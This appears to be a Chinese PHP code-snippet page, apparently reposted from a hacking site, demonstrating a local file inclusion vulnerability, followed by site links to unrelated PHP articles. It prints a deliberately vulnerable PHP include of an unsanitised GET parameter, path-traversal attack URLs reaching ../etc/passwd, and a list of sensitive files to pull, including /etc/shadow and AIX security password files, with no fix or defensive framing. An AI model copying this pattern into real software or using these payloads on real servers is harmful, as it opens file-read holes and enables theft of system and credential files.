php 伪造本地文件包含漏洞的代码

yipeiwu_com5年前 (2020-03-06)PHP代码库

代码:

 
<?php 
$page=$_GET['page']; 
include($page.'php'); 
?> 

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

返回列表

上一篇：Python字符转换

下一篇：PHP生成静态页面详解

php实现压缩合并js的方法【附demo源码下载】

本文实例讲述了php实现压缩合并js的方法。分享给大家供大家参考，具体如下： test.php文件如下： require_once('jsmin.php'); $files = gl...

PHP实现APP微信支付的实例讲解

一、PHP后台后台生成预支付交易单，返回正确的预支付交易回话标识后再在APP里面调起支付! 官方文档:https://pay.weixin.qq.com/wiki/doc/api/app...

php swoole多进程/多线程用法示例【基于php7nts版】

本文实例讲述了php swoole多进程/多线程用法。分享给大家供大家参考，具体如下： swoole的多线程其实就是多进程，进程创建太多切换的开销很大，如果能用上pthreads建议用p...

PHP中extract()函数的妙用分析

近日在看一个牛人的代码时，看到一个非常好用的函数：extract()，它的主要作用是将数组展开，键名作为变量名，元素值为变量值，可以说为数组的操作提供了另外一个方便的工具，比方说，可以很...

PHP实现一维数组与二维数组去重功能示例

本文实例讲述了PHP实现一维数组与二维数组去重功能。分享给大家供大家参考，具体如下：数组中重复项的去除一维数组的重复项：使用array_unique函数即可，使用实例如下： &...

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php实现压缩合并js的方法【附demo源码下载】

PHP实现APP微信支付的实例讲解

php swoole多进程/多线程用法示例【基于php7nts版】

PHP中extract()函数的妙用分析

PHP实现一维数组与二维数组去重功能示例

© YiPeiWu.com 【宜配屋】粤ICP备17031333号

Powered By Z-BlogPHP. Theme by TOYEAN.

宜配屋

php 伪造本地文件包含漏洞的代码

相关文章

php实现压缩合并js的方法【附demo源码下载】

PHP实现APP微信支付的实例讲解

php swoole多进程/多线程用法示例【基于php7nts版】

PHP中extract()函数的妙用分析

PHP实现一维数组与二维数组去重功能示例

© YiPeiWu.com 【宜配屋】 粤ICP备17031333号 var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?8aa60ae04b767b2af31903508928acc0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();

Powered By Z-BlogPHP. Theme by TOYEAN.

© YiPeiWu.com 【宜配屋】粤ICP备17031333号